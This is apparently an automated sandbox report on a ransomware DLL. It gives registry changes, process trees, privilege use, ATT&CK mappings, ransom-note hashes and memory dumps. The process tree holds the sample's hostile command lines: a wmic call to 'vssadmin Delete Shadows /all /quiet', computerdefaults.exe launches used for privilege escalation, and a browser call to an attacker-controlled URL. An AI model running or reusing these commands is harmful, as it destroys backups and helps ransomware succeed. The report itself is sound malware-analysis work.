Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException\Cac = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DNTException"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "MicrosoftEdge_EmieUserList:"
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge\\IECompatCache"
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1140	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
3484	rundll32.exe
3484	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
2988

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

rundll32.exeMicrosoftEdgeCP.exe

pid	Process
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3484	rundll32.exe
3860	MicrosoftEdgeCP.exe
3860	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exe

description	pid	Process
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeIncreaseQuotaPrivilege	64	wmic.exe
Token: SeSecurityPrivilege	64	wmic.exe
Token: SeTakeOwnershipPrivilege	64	wmic.exe
Token: SeLoadDriverPrivilege	64	wmic.exe
Token: SeSystemProfilePrivilege	64	wmic.exe
Token: SeSystemtimePrivilege	64	wmic.exe
Token: SeProfSingleProcessPrivilege	64	wmic.exe
Token: SeIncBasePriorityPrivilege	64	wmic.exe
Token: SeCreatePagefilePrivilege	64	wmic.exe
Token: SeBackupPrivilege	64	wmic.exe
Token: SeRestorePrivilege	64	wmic.exe
Token: SeShutdownPrivilege	64	wmic.exe
Token: SeDebugPrivilege	64	wmic.exe
Token: SeSystemEnvironmentPrivilege	64	wmic.exe
Token: SeRemoteShutdownPrivilege	64	wmic.exe
Token: SeUndockPrivilege	64	wmic.exe
Token: SeManageVolumePrivilege	64	wmic.exe
Token: 33	64	wmic.exe
Token: 34	64	wmic.exe
Token: 35	64	wmic.exe
Token: 36	64	wmic.exe
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeShutdownPrivilege	2988
Token: SeCreatePagefilePrivilege	2988
Token: SeIncreaseQuotaPrivilege	64	wmic.exe
Token: SeSecurityPrivilege	64	wmic.exe
Token: SeTakeOwnershipPrivilege	64	wmic.exe
Token: SeLoadDriverPrivilege	64	wmic.exe
Token: SeSystemProfilePrivilege	64	wmic.exe
Token: SeSystemtimePrivilege	64	wmic.exe
Token: SeProfSingleProcessPrivilege	64	wmic.exe
Token: SeIncBasePriorityPrivilege	64	wmic.exe
Token: SeCreatePagefilePrivilege	64	wmic.exe
Token: SeBackupPrivilege	64	wmic.exe
Token: SeRestorePrivilege	64	wmic.exe
Token: SeShutdownPrivilege	64	wmic.exe
Token: SeDebugPrivilege	64	wmic.exe
Token: SeSystemEnvironmentPrivilege	64	wmic.exe
Token: SeRemoteShutdownPrivilege	64	wmic.exe
Token: SeUndockPrivilege	64	wmic.exe
Token: SeManageVolumePrivilege	64	wmic.exe
Token: 33	64	wmic.exe
Token: 34	64	wmic.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	Process
2988
1056	MicrosoftEdge.exe
3860	MicrosoftEdgeCP.exe
3860	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid	Process
2988

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.exeMicrosoftEdgeCP.exe

description	pid	Process	procid_target
PID 3484 wrote to memory of 1140	3484	rundll32.exe	69
PID 3484 wrote to memory of 1140	3484	rundll32.exe	69
PID 3484 wrote to memory of 4072	3484	rundll32.exe	70
PID 3484 wrote to memory of 4072	3484	rundll32.exe	70
PID 3484 wrote to memory of 64	3484	rundll32.exe	72
PID 3484 wrote to memory of 64	3484	rundll32.exe	72
PID 3484 wrote to memory of 348	3484	rundll32.exe	74
PID 3484 wrote to memory of 348	3484	rundll32.exe	74
PID 3484 wrote to memory of 2216	3484	rundll32.exe	75
PID 3484 wrote to memory of 2216	3484	rundll32.exe	75
PID 2216 wrote to memory of 2044	2216	cmd.exe	78
PID 2216 wrote to memory of 2044	2216	cmd.exe	78
PID 348 wrote to memory of 3860	348	cmd.exe	79
PID 348 wrote to memory of 3860	348	cmd.exe	79
PID 1592 wrote to memory of 3668	1592	cmd.exe	90
PID 1288 wrote to memory of 3348	1288	cmd.exe	89
PID 1288 wrote to memory of 3348	1288	cmd.exe	89
PID 1592 wrote to memory of 3668	1592	cmd.exe	90
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96
PID 3860 wrote to memory of 2760	3860	MicrosoftEdgeCP.exe	96

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\rrthp.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3484
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1140
- C:\Windows\system32\cmd.exe
  cmd /c "start http://f8e8723092783e20agihmepi.hateme.uno/gihmepi^&1^&40868585^&90^&349^&2215063"
  2⤵
  - Checks computer location settings
  PID:4072
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:348
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3860
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2044

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3348

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3400

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1056

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2608

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:2760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
fee30d3749baad16c57bce3a112b5560

SHA1
6c4485db04250205b8cc3b4729bae753ebc8f517

SHA256
619817dcc1b75fc94668cde5e514accb428f68053f495c2356cbacececea588b

SHA512
ce7ba808cde39715833cdace7748ddfb73bf1240cfdab87b3595fa37d4d1a806ee37d28d7e45e375e04db9e09c7ba5584f3f7d2ded907dc828c506591d21a5be

Download Submit
memory/64-132-0x0000000000000000-mapping.dmp

Download
memory/348-133-0x0000000000000000-mapping.dmp

Download
memory/1140-129-0x0000000000000000-mapping.dmp

Download
memory/2044-136-0x0000000000000000-mapping.dmp

Download
memory/2216-134-0x0000000000000000-mapping.dmp

Download
memory/3348-138-0x0000000000000000-mapping.dmp

Download
memory/3484-135-0x0000020725F80000-0x0000020725F81000-memory.dmp

Filesize
4KB

Download
memory/3484-122-0x00000207209C0000-0x00000207209C1000-memory.dmp

Filesize
4KB

Download
memory/3484-124-0x0000020720BE0000-0x0000020720BE1000-memory.dmp

Filesize
4KB

Download
memory/3484-127-0x0000020724450000-0x0000020724451000-memory.dmp

Filesize
4KB

Download
memory/3484-125-0x0000020720BF0000-0x0000020720BF1000-memory.dmp

Filesize
4KB

Download
memory/3484-126-0x0000020720C00000-0x0000020720C01000-memory.dmp

Filesize
4KB

Download
memory/3484-128-0x0000020724460000-0x0000020724465000-memory.dmp

Filesize
20KB

Download
memory/3484-115-0x0000020720CE0000-0x0000020720F1E000-memory.dmp

Filesize
2.2MB

Download
memory/3484-121-0x00000207209B0000-0x00000207209B1000-memory.dmp

Filesize
4KB

Download
memory/3484-123-0x0000020720BD0000-0x0000020720BD1000-memory.dmp

Filesize
4KB

Download
memory/3484-120-0x00000207209A0000-0x00000207209A1000-memory.dmp

Filesize
4KB

Download
memory/3484-119-0x0000020720990000-0x0000020720991000-memory.dmp

Filesize
4KB

Download
memory/3484-118-0x0000020720980000-0x0000020720981000-memory.dmp

Filesize
4KB

Download
memory/3484-116-0x0000020720960000-0x0000020720961000-memory.dmp

Filesize
4KB

Download
memory/3484-117-0x0000020720970000-0x0000020720971000-memory.dmp

Filesize
4KB

Download
memory/3668-139-0x0000000000000000-mapping.dmp

Download
memory/3676-147-0x000002168C830000-0x000002168C838000-memory.dmp

Filesize
32KB

Download
memory/3676-151-0x000002168C9A0000-0x000002168C9A8000-memory.dmp

Filesize
32KB

Download
memory/3676-140-0x000002168C640000-0x000002168C648000-memory.dmp

Filesize
32KB

Download
memory/3676-141-0x000002168C520000-0x000002168C528000-memory.dmp

Filesize
32KB

Download
memory/3676-142-0x000002168C4F0000-0x000002168C4F1000-memory.dmp

Filesize
4KB

Download
memory/3676-143-0x000002168C5E0000-0x000002168C5E8000-memory.dmp

Filesize
32KB

Download
memory/3676-144-0x000002168C6A0000-0x000002168C6A8000-memory.dmp

Filesize
32KB

Download
memory/3676-145-0x000002168C680000-0x000002168C681000-memory.dmp

Filesize
4KB

Download
memory/3676-146-0x000002168C710000-0x000002168C718000-memory.dmp

Filesize
32KB

Download
memory/3676-155-0x000002168C4D0000-0x000002168C4D1000-memory.dmp

Filesize
4KB

Download
memory/3676-148-0x000002168C9A0000-0x000002168C9A8000-memory.dmp

Filesize
32KB

Download
memory/3676-149-0x000002168C9F0000-0x000002168C9F8000-memory.dmp

Filesize
32KB

Download
memory/3676-150-0x000002168C9A0000-0x000002168C9A1000-memory.dmp

Filesize
4KB

Download
memory/3676-154-0x000002168CC50000-0x000002168CC58000-memory.dmp

Filesize
32KB

Download
memory/3676-152-0x000002168C850000-0x000002168C858000-memory.dmp

Filesize
32KB

Download
memory/3676-153-0x000002168C570000-0x000002168C578000-memory.dmp

Filesize
32KB

Download
memory/3860-137-0x0000000000000000-mapping.dmp

Download
memory/4072-131-0x0000000000000000-mapping.dmp

Download